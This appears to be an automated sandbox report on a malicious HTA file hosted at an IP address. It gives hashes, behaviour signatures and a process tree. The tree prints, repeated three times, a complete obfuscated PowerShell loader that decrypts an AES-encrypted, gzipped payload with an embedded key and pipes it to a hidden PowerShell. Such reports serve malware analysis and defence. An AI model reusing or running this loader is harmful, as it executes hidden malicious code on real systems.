Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    10-01-2024 21:28

General

  • Target

    163.5.169.28/atoletter2.hta

  • Size

    1.1MB

  • MD5

    3aa22e06354205638a0560dfd95ba73d

  • SHA1

    bd77bf64a070a8f233197e2db3cdef0879cc446d

  • SHA256

    8867f18c416e402fa6c470e2fa207e2ff1809b69a450356bd8a8c854edea4dd5

  • SHA512

    ce75e12481f9840666fc783bed155779d75845e0b81f5679dd5ea801ad359527b389b611ca11eda321fb28d77dc10089ebf073c41aa00e51b921ea0cc1c28b8b

  • SSDEEP

    1536:qb0rlgqoroRgFUnAFzUbVlt9Ci5namr/l1vcmafSIm+lIWFjBoOuqpd2eWSFU4ww:qb0rlmrkgFUnAFgbVLFnG

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\atoletter2.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2060
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $eAiTrF = 'AAAAAAAAAAAAAAAAAAAAADiqQn+L98Lnbhfc9YVCB5Orw3m2vSQ5edjYIN+I7uvxUInkLQQrayyFuEDHJcxIukMWd0J+xiCidgbbtXz/AjYGsEJg2jibnk4w8bauydN5lzL4aAMjtOBItY7+SmBQG3oqJAt2VltX67rB79Uvi7MiU4ClKSrClrBKSZQ1WJYozCT+Wp93LF80XerBDREAAq2O9LUZQqAejd8Ix11YvvXT97kmknLEjQWmB3RkGdxUt0Qrkat1GhBU0m8StQEZRFVqFQQXEJGStiKuv24k/PmX4/6Yi7tIREBqxX0K026b3LiyK8gD0Kto8uT3tDn23bzDMeGKoEkvvYf6UuB6tUS1KFv8u76v1MRw/alDGIB6CAkPj+gL/IkVL2qtN7K5f3AYEdN3ODeL37pWBeLRa1oMXDAnNS/YzrEQsesDnNCIPhnblwSn0a+aXAF1F4IzACK5RfADPEXMnksO3ODb8Sl17P4N+PmydJ0oZyAoMt+ovN/avgG6E35zlZsRAy28dGpJY02qWDiMCBRO6onbTDDbSLWjOrz5MWTKnl+4z2zEebriQVMiWUM7n8vGRcRREMwFNfu+psmwJeATihW7jsmsRfcaqHTGD6umlmxq4+h9K/0OfwvH33HPiMsS3cZ0trMFg1ZF5o1EvaSGNd8dIvpuABmQ02QI03BoeIk/BmtADEOGrMlr43KAba0GXjRpAQrOpGV55/3N9/5/s4lJAdFvQQCBkF7s6nrbFvIOkYWa2qKu1DUuGtpkC0/YaIMdvsKdublGMWXPJ4hYTNK2s6UOHMz50xCrWfIvoRuciE/gq9lYMyLwsWkbPUwyottwNdMVFySkspYwRxYniB4OhQRj4OJCZu4j83Jy/Mp52UFGO7QGWZTcS5O16A76CO3b4oc+GD9Fgh51AhdYsZ1IFM6R8cMfC+ZO56kw3pfWaFxUff+bOD5PiDmOOu/bQICppqE8SpdSLf1xOHtN/SH+xuet3eaT2vaYY0S3d6ia1QKm';$hFlQR = 'S2VSTnNLUUJiSXVXaUVKYmJFQUN6ZXZuQ1FZUkNmS3k=';$ueqbneh = New-Object 'System.Security.Cryptography.AesManaged';$ueqbneh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ueqbneh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ueqbneh.BlockSize = 128;$ueqbneh.KeySize = 256;$ueqbneh.Key = [System.Convert]::FromBase64String($hFlQR);$bleGb = [System.Convert]::FromBase64String($eAiTrF);$AvnmtSqS = $bleGb[0..15];$ueqbneh.IV = $AvnmtSqS;$kmIzocLDo = $ueqbneh.CreateDecryptor();$nYLAsPvwb = $kmIzocLDo.TransformFinalBlock($bleGb, 16, $bleGb.Length - 16);$ueqbneh.Dispose();$KorHQ = New-Object System.IO.MemoryStream( , $nYLAsPvwb );$cYVuxmc = New-Object System.IO.MemoryStream;$EoaxXywDe = New-Object System.IO.Compression.GzipStream $KorHQ, ([IO.Compression.CompressionMode]::Decompress);$EoaxXywDe.CopyTo( $cYVuxmc );$EoaxXywDe.Close();$KorHQ.Close();[byte[]] $pjaBnP = $cYVuxmc.ToArray();$ShHgsp = [System.Text.Encoding]::UTF8.GetString($pjaBnP);$ShHgsp | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1208
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $eAiTrF = 'AAAAAAAAAAAAAAAAAAAAADiqQn+L98Lnbhfc9YVCB5Orw3m2vSQ5edjYIN+I7uvxUInkLQQrayyFuEDHJcxIukMWd0J+xiCidgbbtXz/AjYGsEJg2jibnk4w8bauydN5lzL4aAMjtOBItY7+SmBQG3oqJAt2VltX67rB79Uvi7MiU4ClKSrClrBKSZQ1WJYozCT+Wp93LF80XerBDREAAq2O9LUZQqAejd8Ix11YvvXT97kmknLEjQWmB3RkGdxUt0Qrkat1GhBU0m8StQEZRFVqFQQXEJGStiKuv24k/PmX4/6Yi7tIREBqxX0K026b3LiyK8gD0Kto8uT3tDn23bzDMeGKoEkvvYf6UuB6tUS1KFv8u76v1MRw/alDGIB6CAkPj+gL/IkVL2qtN7K5f3AYEdN3ODeL37pWBeLRa1oMXDAnNS/YzrEQsesDnNCIPhnblwSn0a+aXAF1F4IzACK5RfADPEXMnksO3ODb8Sl17P4N+PmydJ0oZyAoMt+ovN/avgG6E35zlZsRAy28dGpJY02qWDiMCBRO6onbTDDbSLWjOrz5MWTKnl+4z2zEebriQVMiWUM7n8vGRcRREMwFNfu+psmwJeATihW7jsmsRfcaqHTGD6umlmxq4+h9K/0OfwvH33HPiMsS3cZ0trMFg1ZF5o1EvaSGNd8dIvpuABmQ02QI03BoeIk/BmtADEOGrMlr43KAba0GXjRpAQrOpGV55/3N9/5/s4lJAdFvQQCBkF7s6nrbFvIOkYWa2qKu1DUuGtpkC0/YaIMdvsKdublGMWXPJ4hYTNK2s6UOHMz50xCrWfIvoRuciE/gq9lYMyLwsWkbPUwyottwNdMVFySkspYwRxYniB4OhQRj4OJCZu4j83Jy/Mp52UFGO7QGWZTcS5O16A76CO3b4oc+GD9Fgh51AhdYsZ1IFM6R8cMfC+ZO56kw3pfWaFxUff+bOD5PiDmOOu/bQICppqE8SpdSLf1xOHtN/SH+xuet3eaT2vaYY0S3d6ia1QKm';$hFlQR = 'S2VSTnNLUUJiSXVXaUVKYmJFQUN6ZXZuQ1FZUkNmS3k=';$ueqbneh = New-Object 'System.Security.Cryptography.AesManaged';$ueqbneh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ueqbneh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ueqbneh.BlockSize = 128;$ueqbneh.KeySize = 256;$ueqbneh.Key = [System.Convert]::FromBase64String($hFlQR);$bleGb = [System.Convert]::FromBase64String($eAiTrF);$AvnmtSqS = $bleGb[0..15];$ueqbneh.IV = $AvnmtSqS;$kmIzocLDo = $ueqbneh.CreateDecryptor();$nYLAsPvwb = $kmIzocLDo.TransformFinalBlock($bleGb, 16, $bleGb.Length - 16);$ueqbneh.Dispose();$KorHQ = New-Object System.IO.MemoryStream( , $nYLAsPvwb );$cYVuxmc = New-Object System.IO.MemoryStream;$EoaxXywDe = New-Object System.IO.Compression.GzipStream $KorHQ, ([IO.Compression.CompressionMode]::Decompress);$EoaxXywDe.CopyTo( $cYVuxmc );$EoaxXywDe.Close();$KorHQ.Close();[byte[]] $pjaBnP = $cYVuxmc.ToArray();$ShHgsp = [System.Text.Encoding]::UTF8.GetString($pjaBnP);$ShHgsp | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2852
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2692
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $eAiTrF = 'AAAAAAAAAAAAAAAAAAAAADiqQn+L98Lnbhfc9YVCB5Orw3m2vSQ5edjYIN+I7uvxUInkLQQrayyFuEDHJcxIukMWd0J+xiCidgbbtXz/AjYGsEJg2jibnk4w8bauydN5lzL4aAMjtOBItY7+SmBQG3oqJAt2VltX67rB79Uvi7MiU4ClKSrClrBKSZQ1WJYozCT+Wp93LF80XerBDREAAq2O9LUZQqAejd8Ix11YvvXT97kmknLEjQWmB3RkGdxUt0Qrkat1GhBU0m8StQEZRFVqFQQXEJGStiKuv24k/PmX4/6Yi7tIREBqxX0K026b3LiyK8gD0Kto8uT3tDn23bzDMeGKoEkvvYf6UuB6tUS1KFv8u76v1MRw/alDGIB6CAkPj+gL/IkVL2qtN7K5f3AYEdN3ODeL37pWBeLRa1oMXDAnNS/YzrEQsesDnNCIPhnblwSn0a+aXAF1F4IzACK5RfADPEXMnksO3ODb8Sl17P4N+PmydJ0oZyAoMt+ovN/avgG6E35zlZsRAy28dGpJY02qWDiMCBRO6onbTDDbSLWjOrz5MWTKnl+4z2zEebriQVMiWUM7n8vGRcRREMwFNfu+psmwJeATihW7jsmsRfcaqHTGD6umlmxq4+h9K/0OfwvH33HPiMsS3cZ0trMFg1ZF5o1EvaSGNd8dIvpuABmQ02QI03BoeIk/BmtADEOGrMlr43KAba0GXjRpAQrOpGV55/3N9/5/s4lJAdFvQQCBkF7s6nrbFvIOkYWa2qKu1DUuGtpkC0/YaIMdvsKdublGMWXPJ4hYTNK2s6UOHMz50xCrWfIvoRuciE/gq9lYMyLwsWkbPUwyottwNdMVFySkspYwRxYniB4OhQRj4OJCZu4j83Jy/Mp52UFGO7QGWZTcS5O16A76CO3b4oc+GD9Fgh51AhdYsZ1IFM6R8cMfC+ZO56kw3pfWaFxUff+bOD5PiDmOOu/bQICppqE8SpdSLf1xOHtN/SH+xuet3eaT2vaYY0S3d6ia1QKm';$hFlQR = 'S2VSTnNLUUJiSXVXaUVKYmJFQUN6ZXZuQ1FZUkNmS3k=';$ueqbneh = New-Object 'System.Security.Cryptography.AesManaged';$ueqbneh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ueqbneh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ueqbneh.BlockSize = 128;$ueqbneh.KeySize = 256;$ueqbneh.Key = [System.Convert]::FromBase64String($hFlQR);$bleGb = [System.Convert]::FromBase64String($eAiTrF);$AvnmtSqS = $bleGb[0..15];$ueqbneh.IV = $AvnmtSqS;$kmIzocLDo = $ueqbneh.CreateDecryptor();$nYLAsPvwb = $kmIzocLDo.TransformFinalBlock($bleGb, 16, $bleGb.Length - 16);$ueqbneh.Dispose();$KorHQ = New-Object System.IO.MemoryStream( , $nYLAsPvwb );$cYVuxmc = New-Object System.IO.MemoryStream;$EoaxXywDe = New-Object System.IO.Compression.GzipStream $KorHQ, ([IO.Compression.CompressionMode]::Decompress);$EoaxXywDe.CopyTo( $cYVuxmc );$EoaxXywDe.Close();$KorHQ.Close();[byte[]] $pjaBnP = $cYVuxmc.ToArray();$ShHgsp = [System.Text.Encoding]::UTF8.GetString($pjaBnP);$ShHgsp
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2684

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    993c9830512a70f9ee2b989db1920da7

    SHA1

    0f20ff058ed29743082ebf8ddeacc674e508edf7

    SHA256

    56262b245b84a59686df1810fccd649f426b7b25c74091a4c20bfea3446818fc

    SHA512

    a6ff6c042babc08747ea73a2321a33ee2df92c95e447fdd455983557e6e4bf052029cf4239a75eb0f42017c45fc451f0cf7c93207d862d96399de1c1bbcf093d

  • memory/1208-2-0x0000000072F90000-0x000000007353B000-memory.dmp

    Filesize

    5.7MB

  • memory/1208-6-0x0000000072F90000-0x000000007353B000-memory.dmp

    Filesize

    5.7MB

  • memory/1208-5-0x00000000029A0000-0x00000000029E0000-memory.dmp

    Filesize

    256KB

  • memory/1208-4-0x00000000029A0000-0x00000000029E0000-memory.dmp

    Filesize

    256KB

  • memory/1208-3-0x00000000029A0000-0x00000000029E0000-memory.dmp

    Filesize

    256KB

  • memory/1208-7-0x0000000072F90000-0x000000007353B000-memory.dmp

    Filesize

    5.7MB

  • memory/2684-21-0x0000000002A00000-0x0000000002A40000-memory.dmp

    Filesize

    256KB

  • memory/2684-18-0x0000000073010000-0x00000000735BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2684-24-0x0000000002A00000-0x0000000002A40000-memory.dmp

    Filesize

    256KB

  • memory/2684-27-0x0000000002A00000-0x0000000002A40000-memory.dmp

    Filesize

    256KB

  • memory/2684-35-0x0000000073010000-0x00000000735BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2684-36-0x0000000073010000-0x00000000735BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2692-30-0x0000000073010000-0x00000000735BB000-memory.dmp

    Filesize

    5.7MB

  • memory/2692-32-0x00000000027C0000-0x0000000002800000-memory.dmp

    Filesize

    256KB

  • memory/2692-33-0x00000000027C0000-0x0000000002800000-memory.dmp

    Filesize

    256KB

  • memory/2692-34-0x00000000027C0000-0x0000000002800000-memory.dmp

    Filesize

    256KB

  • memory/2692-37-0x0000000073010000-0x00000000735BB000-memory.dmp

    Filesize

    5.7MB